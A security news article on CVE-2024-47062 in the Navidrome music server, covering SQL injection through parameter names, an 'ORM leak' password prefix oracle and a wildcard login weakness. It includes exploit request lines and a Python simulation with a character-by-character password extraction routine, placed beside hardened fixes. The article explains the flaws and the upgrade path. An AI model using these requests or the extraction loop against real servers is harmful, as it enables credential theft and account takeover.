CVE-2024-47062 (CVSS 9.4): Flaws Discovered in Navidrome Music Server Expose Sensitive Data
A newly published security advisory describes several critical vulnerabilities in Navidrome, a popular open-source music streaming server. The flaws, tracked together as CVE-2024-47062 and rated critical with a CVSS score of 9.4, combine SQL injection, an information leak through automatically generated query filters, and an authentication weakness, giving attackers a path to sensitive data such as stored user credentials.
Navidrome is a widely used, web-based music collection server that lets users stream their personal music libraries from any browser or mobile device, effectively a self-hosted alternative to services like Spotify. That convenience also makes it a target: the vulnerabilities affect older versions of the software and could allow attackers to compromise user data. They were discovered by Louis Nyffenegger of PentesterLab.
Details of the Vulnerabilities
- SQL Injection Vulnerabilities
The most severe flaw is a set of SQL injection points in the /api endpoints, caused by URL parameters that are interpolated into queries without proper escaping. The advisory's example request shows that the injected SQL travels in a parameter name rather than in a value:

GET /api/album?_end=36&_order=DESC&_sort=recently_added&_start=0&SELECT+*+FROM+USER--=123 HTTP/1.1

Because the parameter name reaches the query text, an attacker can read data directly from the database, including user records that hold stored passwords and other personal information.
- ORM Leak
A second issue, which the advisory calls an "ORM leak", arises because any URL parameter is automatically turned into a filter on the column of the same name, and that filter uses SQL LIKE. Since % is a LIKE wildcard, a request such as

GET /api/user?_end=36&_order=DESC&password=AAA%

returns only the users whose stored (encrypted) password value begins with AAA. That turns the endpoint into a prefix oracle: an attacker can confirm the stored value one character at a time and recover it with a slow but reliable brute-force search.
- Authentication Bypass Weakness
The login check compares the username with SQL LIKE instead of an exact equality, so wildcard characters such as % are accepted where a precise username is expected and the lookup no longer requires a real username match, undermining the normal authentication check.
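To make the three weaknesses concrete, here is an added, self-contained Python example. It is not Navidrome's code and not part of the advisory: it simulates the vulnerable filter-building and login patterns against an in-memory SQLite table with constructed sample users, places the hardened equivalents beside them, and carries the prefix oracle through to full recovery of a stored value, which goes beyond the single prefix check shown above. The table layout, the allow-list, and every name other than the request parameters quoted above are assumptions made for the example.

```python
import sqlite3
import string
from urllib.parse import parse_qsl, quote

# Constructed sample data standing in for a Navidrome user table (not the
# real schema). Navidrome stores passwords with reversible encryption; plain
# strings are used here only so the prefix oracle is easy to follow.
SAMPLE_USERS = [("admin", "S3cret!"), ("alice", "AAAbbb")]

# Hypothetical names for this example, not Navidrome's own identifiers.
CONTROL_PARAMS = {"_start", "_end", "_sort", "_order"}  # paging/sorting, never filters
FILTERABLE_COLUMNS = {"user_name"}                      # allow-list for the hardened path

# LIKE metacharacters are left out of the brute-force alphabet: a '%' or '_'
# guess matches anything and would produce a false positive.
ALPHABET = "".join(c for c in string.ascii_letters + string.digits + string.punctuation
                   if c not in "%_")


def make_db():
    conn = sqlite3.connect(":memory:")
    # SQLite's LIKE is case-insensitive for ASCII by default; make it exact so
    # the oracle behaves like a case-sensitive backend.
    conn.execute("PRAGMA case_sensitive_like = ON")
    conn.execute("CREATE TABLE user (user_name TEXT, password TEXT)")
    conn.executemany("INSERT INTO user VALUES (?, ?)", SAMPLE_USERS)
    return conn


def build_vulnerable_sql(query_string):
    """Vulnerable pattern: every non-control URL parameter becomes a
    '<name> LIKE <value>' clause. The parameter name is pasted into the SQL
    text unescaped (the injection surface) and LIKE lets the value carry
    wildcards (the ORM leak)."""
    clauses, args = [], []
    for name, value in parse_qsl(query_string):
        if name in CONTROL_PARAMS:
            continue
        clauses.append(f"{name} LIKE ?")
        args.append(value)
    sql = "SELECT user_name FROM user"
    if clauses:
        sql += " WHERE " + " AND ".join(clauses)
    return sql, args


def build_hardened_sql(query_string):
    """Hardened pattern: only allow-listed columns can be filtered, the
    comparison is exact, and the value is bound rather than interpolated."""
    clauses, args = [], []
    for name, value in parse_qsl(query_string):
        if name in CONTROL_PARAMS:
            continue
        if name not in FILTERABLE_COLUMNS:
            raise ValueError(f"filtering on {name!r} is not allowed")
        clauses.append(f"{name} = ?")
        args.append(value)
    sql = "SELECT user_name FROM user"
    if clauses:
        sql += " WHERE " + " AND ".join(clauses)
    return sql, args


def run(conn, builder, query_string):
    """Execute a query string through one of the builders; returns user names."""
    sql, args = builder(query_string)
    return [row[0] for row in conn.execute(sql, args)]


def vulnerable_login(conn, username, password):
    """Login that matches the username with LIKE: a '%' username matches every row,
    so any valid password for some account is enough to get in."""
    row = conn.execute(
        "SELECT user_name FROM user WHERE user_name LIKE ? AND password = ?",
        (username, password)).fetchone()
    return row[0] if row else None


def hardened_login(conn, username, password):
    """Exact match on both fields; a wildcard username is just a literal string."""
    row = conn.execute(
        "SELECT user_name FROM user WHERE user_name = ? AND password = ?",
        (username, password)).fetchone()
    return row[0] if row else None


def extract_password(conn, user_name, max_len=64):
    """Drive the ORM leak as a prefix oracle: keep extending the guessed
    prefix while 'password=<prefix><c>%' still returns the target user."""
    prefix = ""
    while len(prefix) < max_len:
        for c in ALPHABET:
            guess = quote(prefix + c, safe="") + "%"  # trailing % is the LIKE wildcard
            q = f"_end=36&_order=DESC&user_name={quote(user_name)}&password={guess}"
            if run(conn, build_vulnerable_sql, q) == [user_name]:
                prefix += c
                break
        else:
            break  # no character extends the prefix: the full value is recovered
    return prefix


if __name__ == "__main__":
    db = make_db()
    print(run(db, build_vulnerable_sql, "_end=36&_order=DESC&password=AAA%"))
    print(vulnerable_login(db, "%", "S3cret!"), hardened_login(db, "%", "S3cret!"))
    print(extract_password(db, "admin"))
```

The hardened builder fixes both query-side problems with one allow-list: an unknown parameter name is rejected instead of being pasted into the SQL, which closes the injection point, and a password column that is not in the list can no longer be used as a LIKE oracle. The cost of the oracle for an attacker is linear in the length of the stored value times the alphabet size, which is why the advisory describes the attack as slow rather than impractical.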
Impact of the Vulnerabilities
If successfully exploited, these vulnerabilities allow an attacker to read from the Navidrome database, dumping sensitive data and sidestepping the login check. The ORM leak additionally lets an attacker brute-force the stored, encrypted passwords one prefix at a time and take over user accounts.
Affected Versions and Patches
CVE-2024-47062 affects Navidrome versions up to and including v0.52.5. The issues are fixed in version 0.53.0, and users of affected versions should upgrade to 0.53.0 or later without delay. Because the ORM leak can disclose stored password material on an unpatched instance, rotating user passwords after upgrading is a sensible precaution for servers that were reachable while vulnerable.